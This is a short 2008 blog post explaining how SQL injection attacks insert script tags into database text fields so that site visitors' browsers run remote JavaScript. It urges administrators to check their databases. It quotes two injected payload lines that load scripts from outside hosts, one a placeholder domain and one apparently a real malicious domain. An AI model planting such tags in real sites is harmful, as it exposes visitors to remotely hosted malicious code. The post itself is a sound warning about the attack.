Tuesday, November 4, 2008

What is a SQL Injection Attack

A SQL injection attack will corrupt your SQL Server database by injecting a script into text data type fields. These scripts usually look something like this:

<script src="http://somedomain.com/abc.js"></script>

It is hard to know whether your DB has been injected, because in SQL injection attacks the site mostly behaves normally; but when someone opens your website, some background activity is performed from their PC. This works because when someone opens a page that pulls data from the DB, the page also pulls in this script tag, and the browser tries to run the script as if it were part of the page.

This script poses more danger to the site visitor, as the actual script runs on their computer. The infected website's host server will not misbehave, as the script never runs there.

If you search Google for "<script src="http://www.usabnr.com/ngg.js></script>" you will get an idea of how many sites are infected by this attack, and most site administrators will not be aware of it. So keep checking your DB, especially the text fields.
